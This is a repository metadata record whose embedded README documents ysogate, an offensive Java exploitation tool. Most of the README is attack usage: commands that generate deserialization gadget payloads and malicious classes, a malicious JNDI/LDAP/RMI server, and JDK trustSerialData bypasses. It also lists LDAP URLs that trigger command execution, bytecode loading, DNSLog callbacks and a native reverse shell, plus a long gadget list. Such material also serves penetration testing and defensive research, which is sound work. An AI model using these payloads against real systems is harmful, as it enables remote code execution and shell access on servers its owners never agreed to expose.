{"id":13575557,"url":"https://github.com/H4cking2theGate/ysogate","last_synced_at":"2025-04-04T22:31:30.147Z","repository":{"id":202801385,"uuid":"708080877","full_name":"H4cking2theGate/ysogate","owner":"H4cking2theGate","description":"Java deserialization / JNDI injection / malicious class generation tool, supporting multiple bypasses for newer JDK versions and extended exploitation such as output echo and in-memory shells.","archived":false,"fork":false,"pushed_at":"2025-02-09T08:23:11.000Z","size":277,"stargazers_count":89,"open_issues_count":0,"forks_count":7,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-02-09T09:24:15.724Z","etag":null,"topics":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/H4cking2theGate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-21T13:20:19.000Z","updated_at":"2025-02-09T08:23:14.000Z","dependencies_parsed_at":null,"dependency_job_id":"ea385061-d422-4f09-ad1d-952d7d7ade74","html_url":"https://github.com/H4cking2theGate/ysogate","commit_stats":null,"previous_names":["h4cking2thegate/ysogate"],"tags_count":9,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4cking2theGate%2Fysogate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/H4c
king2theGate%2Fysogate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/H4cking2theGate","download_url":"https://codeload.github.com/H4cking2theGate/ysogate/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247260654,"owners_count":20910047,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","deserialization-vulnerability","java","jndi-exploit","jrmp","ldap","payload-generator","rmi","ysoserial"],"created_at":"2024-08-01T15:01:02.129Z","updated_at":"2025-04-04T22:31:25.138Z","avatar_url":"https://github.com/H4cking2theGate.png","language":"Java","readme":"# ysogate\n\nysogate is an all-in-one Java exploitation tool. It supports JNDI-injection-related exploitation, includes multiple bypasses for newer JDK versions, and supports fragmented gadget generation and composition.\n\n- Generates multiple Java deserialization gadget payloads\n- Supports multiple exploitation methods such as JNDI/LDAP/RMI/JRMP\n- Flexible command-line interface with multiple operation modes\n- Extensible architecture that makes it easy to add new gadgets and attack vectors\n- Supports multiple bypasses for newer JDK versions\n- Supports extended exploitation methods such as in-memory shells, output echo, and proxies\n\n## Usage\n\nThe tool has the following modes: `-m jndi` starts the JNDI server, `-m payload` generates deserialization payloads, and `-m gen` generates malicious classes.\n\n```bash\n[root]#~  H4cking to the Gate !\n[root]#~  Usage:\n[root]#~  Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~  JNDI    Mode: java -jar ysogate-[version]-all.jar -m jndi    [JNDI OPTIONS]\n[root]#~  Gen     Mode: java -jar ysogate-[version]-all.jar -m gen     [GEN OPTIONS]\n```\n\n## Gen Mode\n\nUse `-m gen` to select gen mode, which generates malicious classes.\n\n```\n[root]#~  Gen Mode Options:\n -bypass                   ByPass JDK Module\n -f,--format \u003carg\u003e         Output format\n -h,--help                 Show help message\n -m,--mode \u003carg\u003e           Operation mode: 'payload' or 'jndi' or 'gen'\n -name,--classname \u003carg\u003e   Evil Class Name\n -s,--sink \u003carg\u003e           Evil sink template\n -t,--type \u003carg\u003e           Middleware type\n```\n\nExample: generate a command-execution echo class for springmvc, adding `-bypass` to get around the restrictions of newer JDK versions (applies to JDK 17).\n\n```\njava -jar ysogate-[version]-all.jar -m gen -t springmvc -s CmdExec -name org.springframework.expression.Evil -bypass\n```\n\nThe supported middleware/frameworks and execution modes are listed below.\n\n| Middleware/Framework | Execution modes   |\n| -------------------- | ----------------- |\n| springmvc            | CmdExec, CodeExec |\n| tomcat               | CmdExec, CodeExec |\n| resin                | CmdExec, CodeExec |\n| weblogic             | CmdExec, CodeExec |\n| jetty                | CmdExec, CodeExec |\n| websphere            | CmdExec, CodeExec |\n| undertow             | CmdExec, CodeExec |\n| glassfish            | CmdExec, CodeExec |\n| struts2              | CmdExec, CodeExec |\n\n## JNDI Mode\n\nUse `-m jndi` to select jndi mode, which runs a malicious JNDI server locally.\n\n```\n[root]#~  JNDI Mode Options:\n -h,--help              Show help message\n -hp,--httpPort \u003carg\u003e   HTTP port\n -i,--ip \u003carg\u003e          IP address for JNDI server\n -ldap2rmi              change ldap to rmi to bypass trustSerialData\n -lp,--ldapPort \u003carg\u003e   LDAP port\n -m,--mode \u003carg\u003e        Operation mode: 'payload' or 'jndi' or 'gen'\n -onlyRef               use Reference only to bypass trustSerialData\n -rp,--rmiPort \u003carg\u003e    RMI port\n```\n\nFor example:\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\n\n### trustSerialData bypass\n\nIn JDK 20+ the `com.sun.jndi.ldap.object.trustSerialData` property defaults to `false`, so deserialization in com.sun.jndi.ldap.Obj#decodeObject is no longer possible. The main bypasses are:\n\n**ldap2rmi**\n\nSet javaRemoteLocation so that com.sun.jndi.ldap.Obj#decodeRmiObject is used to reconstruct the Factory object, switching from LDAP to RMI to get around the check.\n\nAdd `-ldap2rmi` at startup to attempt this bypass, for example:\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 
-ldap2rmi\n```\n\n**onlyRef**\n\nWhen attacking with a local Factory, set `objectClass` to `javaNamingReference` to avoid deserialization; the Factory object is then reconstructed via decodeReference. This does not apply to the BeanFactory bypass, because BeanFactory requires the ResourceRef type.\n\nAdd `-onlyRef` at startup to attempt this bypass, for example:\n\n```\njava -jar ysogate-[version]-all.jar -m jndi -i 0.0.0.0 -onlyRef\n```\n\n### codebase injection\n\nWorks for both LDAP and RMI: the JNDI Reference specifies a codebase from which the ObjectFactory is loaded remotely. Requires trustURLCodebase=true.\n\n```\n# parameters support URL-safe base64\nldap://127.0.0.1:1389/Basic/xxxxxxx/Y2FsYw==\n\n# execute a command\nldap://127.0.0.1:1389/Basic/Command/calc\n\n# DNSLog\nldap://127.0.0.1:1389/Basic/DNSLog/xxx.dnslog.cn\n\n# load custom bytecode\nldap://127.0.0.1:1389/Basic/Custom/data:yv66vxxxxxxxxxxxxx\n\n# load custom bytecode from /tmp/a.class\nldap://127.0.0.1:1389/Basic/Custom/file:L3RtcC9hLmNsYXNz\n\n# load in-memory shell (todo)\nldap://127.0.0.1:1389/Basic/Custom/mem:Tomcat\n\n# native reverse shell (Windows supported)\nldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/4444\n```\n\n### BeanFactory-based\n\nThe BeanFactory class exists in Tomcat 8+ or Spring Boot 1.2.x+, and requires a Tomcat version below 9.0.63 or below 8.5.79.\n\n**Tomcat ELProcessor**\n\nUses javax.el.ELProcessor#eval\n\n```\n# usage is the same as Basic\n\n# use EL to call ScriptEngineManager to load bytecode (Nashorn was removed after JDK 15)\nldap://127.0.0.1:1389/ELProcessor/Command/calc\nldap://127.0.0.1:1389/ELProcessor/Custom/data:yv66vxxxxxxxxxxxxx\n\n# on JDK 9+ EL can call JShell to load bytecode\nldap://127.0.0.1:1389/EL2JShell/Command/calc\n```\n\n**GroovyShell \u0026 GroovyClassLoader**\n\nUses groovy.lang.GroovyShell#evaluate and groovy.lang.GroovyClassLoader#parseClass(java.lang.String)\n\n```\n# usage is the same as Basic\nldap://127.0.0.1:1389/GroovyClassLoader/Command/calc\nldap://127.0.0.1:1389/GroovyShell/Command/calc\n```\n\n**SnakeYaml**\n\nUses org.yaml.snakeyaml.Yaml#load(java.lang.String)\n\n```\n# usage is the same as Basic\nldap://127.0.0.1:1389/SnakeYaml/Command/calc\n```\n\n**XStream**\n\nUses com.thoughtworks.xstream.XStream#fromXML(java.net.URL)\n\nCan trigger CVE-2021-39149; requires XStream \u003c 1.4.18\n\n```\n# only command execution is implemented for now\nldap://127.0.0.1:1389/XStream/calc\n```\n\n**MLet**\n\nUse MLet to probe for classes present on the classpath\n\n```\nldap://127.0.0.1:1389/MLet/com.example.TestClass\n```\n\nIf the class `com.example.TestClass` exists, the HTTP server receives a request for `/com/example/TestClass_exists.class`.\n\n**NativeLibLoader**\n\nUses com.sun.glass.utils.NativeLibLoader#loadLibrary to load a dynamic library on the target server; applies to scenarios where files can be written.\n\nWrite a dll/so/dylib file, e.g. /tmp/evil.so, and pass the path without its extension, i.e. /tmp/evil.\n\n```\nldap://127.0.0.1:1389/NativeLibLoader/L3RtcC9ldmls\n```\n\n### JDBC RCE\n\nThe following connection pools are supported\n\n- Commons DBCP\n- Tomcat DBCP\n- Tomcat JDBC\n- Alibaba Druid\n- HikariCP\n- C3P0\n\nThe following databases are supported\n\n- Mysql\n- PostgreSQL\n- H2\n- IBM DB2\n- Derby\n- Teradata\n\n### Deserialization\n\nRCE via deserialization; the RMI protocol is not supported yet.\n\n```\n# execute a command\nldap://127.0.0.1:1389/Deserialize/{gadget}/Command/{cmd}\n\n# load custom bytecode (some gadgets require extending AbstractTranslet)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/data:yv66vxxxxxxxxxxxxx\n\n# load custom bytecode from /tmp/a.class (some gadgets require extending AbstractTranslet)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/file:L3RtcC9hLmNsYXNz\n\n# load in-memory shell (todo)\nldap://127.0.0.1:1389/Deserialize/{gadget}/Custom/mem:Tomcat\n\n# example\nldap://127.0.0.1:1389/Deserialize/Jackson2/Command/calc\n```\n\n## Payload Mode\n\nUse `-m payload` to select payload mode, which generates a custom deserialization payload, for example:\n\n```\njava -jar ysogate-[version]-all.jar -m payload -g Jackson1 -p calc -b64\n```\n\nFull usage:\n\n```bash\n[root]#~  H4cking to the Gate !\n[root]#~  Usage:\n[root]#~  Payload Mode: java -jar ysogate-[version]-all.jar -m payload [PAYLOAD OPTIONS]\n[root]#~  JNDI Mode:    java -jar ysogate-[version]-all.jar -m jndi [JNDI OPTIONS]\n\n[root]#~  Payload Mode Options:\n -b64,--base64           Encode Output into base64\n -f,--file \u003carg\u003e         Write Output into FileOutputStream (Specified FileName)\n -g,--gadget \u003carg\u003e       Java deserialization gadget\n -h,--help               Show help message\n -m,--mode \u003carg\u003e         Operation mode: 'payload' or 'jndi'\n -ol,--overlong          Use overlong UTF-8 encoding\n -p,--parameters \u003carg\u003e   Gadget parameters\n\n\n[root]#~  Available payload 
types:\n00:40:55.537 [main] INFO org.reflections.Reflections - Reflections took 63 ms to scan 1 urls, producing 22 keys and 233 values\n     Payload                                     Dependencies                                                                                                                                                                                        \n     -------                                     ------------                                                                                                                                                                                        \n     AspectJWeaver                               aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                                      \n     AspectJWeaver2                              aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                                      \n     BeanShell1                                  bsh:2.0b5                                                                                                                                                                                           \n     BeanShell20b4                               bsh:2.0b4                                                                                                                                                                                           \n     C3P0                                        c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                           \n     C3P02                                       c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35                              
                                                                                                              \n     C3P03                                       c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, groovy:2.3.9                                                                                                                              \n     C3P04                                       c3p0:0.9.5.2, mchange-commons-java:0.2.11, tomcat:8.5.35, snakeyaml:1.30                                                                                                                            \n     C3P092                                      c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8, mchange-commons-java:0.2.11                                                                                                                                   \n     Click1                                      click-nodeps:2.3.0, javax.servlet-api:3.1.0                                                                                                                                                         \n     Clojure                                     clojure:1.8.0                                                                                                                                                                                       \n     CommonsBeanutils1                           commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               \n     CommonsBeanutils1183NOCC                    commons-beanutils:1.8.3                                                                                                                                                                             \n     CommonsBeanutils2                           commons-beanutils:1.9.2                                                                                       
                                                                                      \n     CommonsBeanutils2183NOCC                    commons-beanutils:1.8.3, commons-logging:1.2                                                                                                                                                        \n     CommonsBeanutils3                           commons-beanutils:1.9.2, commons-collections:3.1                                                                                                                                                    \n     CommonsBeanutils3183                        commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               \n     CommonsBeanutils4                           commons-beanutils:1.9.2, commons-collections:3.1                                                                                                                                                    \n     CommonsBeanutilsAttrCompare                 commons-beanutils:1.9.2                                                                                                                                                                             \n     CommonsBeanutilsAttrCompare183              commons-beanutils:1.8.3                                                                                                                                                                             \n     CommonsBeanutilsObjectToStringComparator    commons-beanutils:1.9.2, commons-lang3:3.10                                                                                                                                                         \n     CommonsBeanutilsObjectToStringComparator183 commons-beanutils:1.8.3, commons-lang3:3.10                                                                                           
                                                              \n     CommonsBeanutilsPropertySource              commons-beanutils:1.9.2, log4j-core:2.17.1                                                                                                                                                          \n     CommonsBeanutilsPropertySource183           commons-beanutils:1.9.2, log4j-core:2.17.1                                                                                                                                                          \n     CommonsCollections1                         commons-collections:3.1                                                                                                                                                                             \n     CommonsCollections10                        commons-collections:3.2.1                                                                                                                                                                           \n     CommonsCollections11                                                                                                                                                                                                                            \n     CommonsCollections12                        commons-collections:3.2.1                                                                                                                                                                           \n     CommonsCollections2                         commons-collections4:4.0                                                                                                                                                                            \n     CommonsCollections3                         commons-collections:3.1                                                                                                                                       
                                      \n     CommonsCollections4                         commons-collections4:4.0                                                                                                                                                                            \n     CommonsCollections5                         commons-collections:3.1                                                                                                                                                                             \n     CommonsCollections6                         commons-collections:3.1                                                                                                                                                                             \n     CommonsCollections6Lite                     commons-collections:3.1                                                                                                                                                                             \n     CommonsCollections7                         commons-collections:3.1                                                                                                                                                                             \n     CommonsCollections8                         commons-collections4:4.0                                                                                                                                                                            \n     CommonsCollections9                         commons-collections:3.2.1                                                                                                                                                                           \n     CommonsCollectionsK1                        commons-collections:\u003c=3.2.1                                                                                                                                                      
                   \n     CommonsCollectionsK2                        commons-collections4:4.0                                                                                                                                                                            \n     Fastjson1                                   \u003c=1.2.xx                                                                                                                                                                                            \n     Fastjson2                                   \u003c=2.0.26?                                                                                                                                                                                           \n     FileUpload1                                 commons-fileupload:1.3.1, commons-io:2.4                                                                                                                                                            \n     Groovy1                                     groovy:2.3.9                                                                                                                                                                                        \n     Hibernate1                                  hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1                                                                                     \n     Hibernate2                                  hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1                                                                                     \n     JBossInterceptors1                          javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                       
     \n     JRE8u20                                                                                                                                                                                                                                         \n     JRE8u20_2                                                                                                                                                                                                                                       \n     JRMPClient                                                                                                                                                                                                                                      \n     JRMPClient_Activator                                                                                                                                                                                                                            \n     JRMPClient_Obj                                                                                                                                                                                                                                  \n     JRMPListener                                                                                                                                                                                                                                    \n     JSON1                                       json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1\n     Jackson1                                    jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE                                                                                                                                                   \n     Jackson2    
                                jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE                                                                                                                                                   \n     JavassistWeld1                              javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                        \n     Jdk7u21                                                                                                                                                                                                                                         \n     Jdk7u21variant                                                                                                                                                                                                                                  \n     Jython1                                     jython-standalone:2.5.2                                                                                                                                                                             \n     MozillaRhino1                               js:1.7R2                                                                                                                                                                                            \n     MozillaRhino2                               js:1.7R2                                                                                                                                                                                            \n     Myfaces1                                                                                                                                                                                                                                        \n     Myfaces2                            
        myfaces-impl:2.2.9, myfaces-api:2.2.9, apache-el:8.0.27, javax.servlet-api:3.1.0, mockito-core:1.10.19, hamcrest-core:1.1, objenesis:2.1                                                            \n     ROME                                        rome:1.0                                                                                                                                                                                            \n     ROME2                                       rome:1.0                                                                                                                                                                                            \n     ROME3                                       rome:1.0                                                                                                                                                                                            \n     SignedObject                                                                                                                                                                                                                                    \n     Spring1                                     spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                               \n     Spring2                                     spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                           \n     Spring3                                     spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2                                                                                                                    \n     URLDNS                                                      
                                                                                                                                                                                     \n     Vaadin1                                     vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                          \n     Wicket1                                     wicket-util:6.23.0, slf4j-api:1.6.4                                                                                                                                                                 \n     XStream39144                                Xstream:\u003c1.4.18                                                                                                                                                                                     \n     XStream39149                                Xstream:\u003c1.4.18                                                                                                                                                                                     \n\n```\n\n## Todo\n\n- [x] Basic deserialization payload generation\n- [x] Add JNDI/LDAP/RMI/JRMP exploitation methods\n- [x] Bypass trustSerialData\n- [ ] Complete the gadgets for third-party libraries\n- [x] Add middleware echo\n- [ ] Add extended attacks on the bytecode-loading side, such as echo, in-memory shells, and proxies\n- [ ] Add RMI deserialization exploitation\n- [x] Add protection bypasses such as overlong UTF-8 / dirty data\n\n## Disclaimer\n\nThis project is intended solely for security research and learning; any illegal use is prohibited.\n\nIf you engage in any illegal activity while using this project, you bear the consequences yourself.\n\nDo not use this project unless you have fully read, completely understood, and accepted this agreement.\n\n## Reference\n\n - https://github.com/frohoff/ysoserial\n - https://github.com/X1r0z/JNDIMap\n - 
https://tttang.com/archive/1405/","funding_links":[],"categories":["Java"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FH4cking2theGate%2Fysogate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FH4cking2theGate%2Fysogate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FH4cking2theGate%2Fysogate/lists"}